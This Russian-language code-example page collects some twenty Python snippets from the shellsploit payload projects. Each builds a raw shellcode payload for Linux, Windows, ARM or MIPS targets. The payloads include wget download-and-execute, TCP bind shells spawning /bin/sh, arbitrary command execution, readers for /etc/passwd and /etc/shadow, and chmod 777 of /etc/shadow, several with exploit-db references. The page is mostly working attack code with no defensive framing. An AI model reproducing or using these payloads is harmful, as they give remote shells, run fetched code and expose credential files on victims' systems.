Python Shellcode примеры, lib.payloads.shellcode.Shellcode Python примеры использования

Пример #1

0

Показать файл

Файл: download.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = \
         101 + Shellcode().getsize(kwargs["filename"]) * 2 + Shellcode().getsize([kwargs["url"]])
     Shellcode.info["payload"] = [
         r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
         r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
         r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
         r"\xc0\x50\xb0\x0f" + kwargs["filename"] +
         r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
         r"\xc0\x50" + kwargs["filename"] +
         r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
         r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" + kwargs["url"] +
         r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
         r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
         r"\x52\x51\x53\x89\xe1\xcd\x80"
     ]

Пример #2

0

Показать файл

class Payload(Shellcode):
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"])
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x776f6461",
        "push   $0x68732f63",
        "push   $0x74652f2f",
        "mov    $0xf,%al",
        "mov    %esp,%ebx",
        "mov    $0x1ff,%cx",
        "int    $0x80",
        "xor    %eax,%eax",
        "inc    %eax",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]

Пример #3

0

Показать файл

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 28 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46"
         r"\x10\x30\xff\x21\xff\x31\x01\x31\x0f\x37"
         r"\x01\xdf\x40\x40\x01\x27\x01\xdf" + kwargs["file"]
     ]

Пример #4

0

Показать файл

Файл: tcp_bindx86.py Проект: shinphoowin/shellsploit-framework

class Payload(Shellcode):
    Shellcode.info["author"] = "xmgv"
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"])
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x68732f2f",
        "push   $0x6e69622f",
        "mov    %esp,%ebx",
        "push   %eax",
        "push   %ebx",
        "mov    %esp,%ecx",
        "mov    $0xb,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]

Пример #5

0

Показать файл

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 29 + Shellcode().getsize(kwargs["execommand"])
     Shellcode.info["payload"] = [
         r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c"
         r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31"
         r"\xc0\x48\x83\xc8\x3b\x0f\x05"
         + kwargs["execommand"]
     ]

Пример #6

0

Показать файл

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
         r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
         r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
         r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
         r"\x80\x31\xc0\xb0\x01\xcd\x80"
     ]

Пример #7

0

Показать файл

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 47 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20"
         r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62"
         r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50"
         r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50"
         r"\xcd\x91\xe8\xdb\xff\xff\xff" + kwargs["file"]
     ]

Пример #8

0

Показать файл

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["execommand"])
     Shellcode.info["payload"] = [
         r"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68" 
         r"\x68\x2f\x2f\x62\x69\x89\xe3"        
         r"\x50\x66\x68\x2d\x63\x89\xe7\x50"             	
         r"\x51\x57\x53\x89\xe7\x50\x57\x53"                 	
         r"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff" 
         + kwargs["execommand"]
     ]

Пример #9

0

Показать файл

Файл: readfilex64.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 82 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31"
         r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89"
         r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48"
         r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01"
         r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
         r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41" +
         kwargs["file"]
     ]

Пример #10

0

Показать файл

Файл: tcp_bind.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 93 + Shellcode().getsize(kwargs["lport"])
     Shellcode.info["payload"] = [
         r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16"
         r"\x31\xc0\x50\x68\xff\x02" + kwargs["lport"] +
         r"\x89\xe7\x6a\x02\x50\x50"
         r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0"
         r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea"
         r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79"
         r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
         r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6"
     ]

Пример #11

0

Показать файл

    def __init__(self, **kwargs):
        db = []
        for x in kwargs["execommand"]:
            db.append("\\x" + x.encode("hex"))
        kwargs["execommand"] = "".join(db)

        Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"])
        Shellcode.info["payload"] = [
            r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
            r"\x78\x46\x0a\x30\x01\x90"
            r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + kwargs["execommand"]
        ]

Пример #12

0

Показать файл

Файл: tcp_bind.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
     Shellcode.info["payload"] = [
         r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50"
         r"\xb0\x61\xcd\x80\x96\x52\x66\x68" + kwargs["lport"] +
         r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd"
         r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56"
         r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea"
         r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75"
         r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
         r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80"
     ]

Пример #13

0

Показать файл

Файл: chmod.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\xff\xff\x06\x28\xff\xff"
         r"\xd0\x04\xff\xff\x05\x28"
         r"\xb6\x01\x05\x24\x01\x10"
         r"\xe4\x27\x1f\xf0\x84\x24"
         r"\xaf\x0f\x02\x24\x0c\x01"
         r"\x01\x01\xff\xff\x04\x28"
         r"\xa1\x0f\x02\x24\x0c\x01"
         r"\x01\x01" + kwargs["file"]
     ]

Пример #14

0

Показать файл

Файл: execc.py Проект: sploitamos/shellsploit-library

    def __init__(self, **kwargs):
        db = []
        for x in kwargs["execommand"]:
            db.append("\\x" + x.encode("hex"))
        kwargs["execommand"] = "".join(db)

        Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"])
        Shellcode.info["payload"] = [
            r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
            r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
            r"\x00\x00\x00" + kwargs["execommand"] +
            r"\x00\x57\x53\x89\xe1\xcd\x80"
        ]

Пример #15

0

Показать файл

Файл: tcp_bindx86.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
     Shellcode.info["payload"] = [
         r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
         r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
         r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
         r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
         r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
         r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
         r"\xcd\x80\x93\x31\xc9\xb1\x02"
         r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
         r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
         r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
     ]

Пример #16

0

Показать файл

Файл: downloadandexecute.py Проект: ufwt/shellsploit-framework

 def __init__(self, **kwargs):
     Shellcode.info["size"] = \
         187 + Shellcode().getsize(kwargs["payload"])
     Shellcode.info["payload"] = [
         r"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31"
         r"\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f"
         r"\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89"
         r"\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd"
         r"\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01"
         r"\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b"
         r"\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd"
         + kwargs["payload"] +
         r"\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6"
         r"\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75"
         r"\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c"
         r"\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"
     ]

Пример #17

0

Показать файл

Файл: readfilex86.py Проект: shinphoowin/shellsploit-framework

class Payload(Shellcode):
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"])
    Shellcode.info["rawassembly"] = [
        "xor    %ecx,%ecx",
        "xor    %eax,%eax",
        "xor    %edx,%edx",
        "push   %ecx",
        "mov    $0x5,%al",
        "push   $0x64777373",
        "push   $0x61702f63",
        "push   $0x74652f2f",
        "mov    %esp,%ebx",
        "int    $0x80",
        "mov    %ebx,%ecx",
        "mov    %eax,%ebx",
        "mov    $0x3,%al",
        "mov    $0xfff,%dx",
        "inc    %dx",
        "int    $0x80",
        "xor    %eax,%eax",
        "xor    %ebx,%ebx",
        "mov    $0x1,%bl",
        "mov    $0x4,%al",
        "int    $0x80",
        "xor    %eax,%eax",
        "mov    $0x1,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]

Пример #18

0

Показать файл

class Payload(Shellcode):
	Shellcode.info["author"] = "Unkown"
	Shellcode.info["name"] = "Linux/x86 - exec shellcode"
	Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"])


	def __init__(self, **kwargs):
		db = [] 
		for x in kwargs["execommand"]:
			db.append("\\x"+x.encode("hex"))
		kwargs["execommand"] = "".join(db)



		Shellcode.info["payload"] = [
			r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
			r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
			r"\x00\x00\x00"
			+kwargs["execommand"]+
			r"\x00\x57\x53\x89\xe1\xcd\x80"
		]

Пример #19

0

Показать файл

Файл: chmod.py Проект: sploitamos/shellsploit-library

 def __init__(self, **kwargs):
     Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"])
     Shellcode.info["payload"] = [
         r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
         r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
     ]

Пример #20

0

Показать файл

class Payload(Shellcode):
	Shellcode.info["author"] = "B3mB4m"
	Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
	Shellcode.info["references"] = [
		"https://www.exploit-db.com/exploits/39389/"
	]
	Shellcode.info["size"] = \
			101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]])
	

	Shellcode.info["rawassembly"] = [
		"xor eax,eax",
		"mov al,0x2",
		"int 0x80",
		"xor ebx,ebx",
		"cmp eax,ebx",
		"jz 0x47",
		"xor ecx,ecx",
		"xor ebx,ebx",
		"xor eax,eax",
		"push byte +0x5",
		"mov ecx,esp",
		"mov ecx,esp",
		"mov ebx,esp",
		"mov al,0xa2",
		"int 0x80",
		"xor ecx,ecx",
		"xor eax,eax",
		"push eax",
		"mov al,0xf",
		"push byte +0x68",
		"mov ebx,esp",
		"xor ecx,ecx",
		"mov cx,0x1ff",
		"int 0x80",
		"xor eax,eax",
		"push eax",
		"push byte +0x68",
		"mov ebx,esp",
		"push eax",
		"mov edx,esp",
		"push ebx",
		"mov ecx,esp",
		"mov al,0xb",
	 	"int 0x80",
		"xor eax,eax",
		"inc eax",
		"int 0x80",
		"push byte +0xb",
		"pop eax",
		"cdq",
		"push edx",
		"push dword 0x682f6365",
		"push dword 0x78652f2f",
		"push dword 0x6f692e62",
		"push dword 0x75687469",
		"push dword 0x672e6d34",
		"push dword 0x626d3362",
		"mov ecx,esp",
		"push edx",
		"push byte +0x74",
		"push dword 0x6567772f",
		"push dword 0x6e69622f",
		"push dword 0x7273752f",
		"mov ebx,esp",
		"push edx",
		"push ecx",
		"push ebx",
		"mov ecx,esp",
		"int 0x80",
	]

	
	def __init__(self, **kwargs): 
		Shellcode.info["payload"] = [
			r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
			r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
			r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
			r"\xc0\x50\xb0\x0f"
			+kwargs["filename"]+
			r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
			r"\xc0\x50"
			+kwargs["filename"]+
			r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
			r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52"
			+kwargs["url"]+
			r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
			r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
			r"\x52\x51\x53\x89\xe1\xcd\x80"

		]

Python Shellcode примеры использования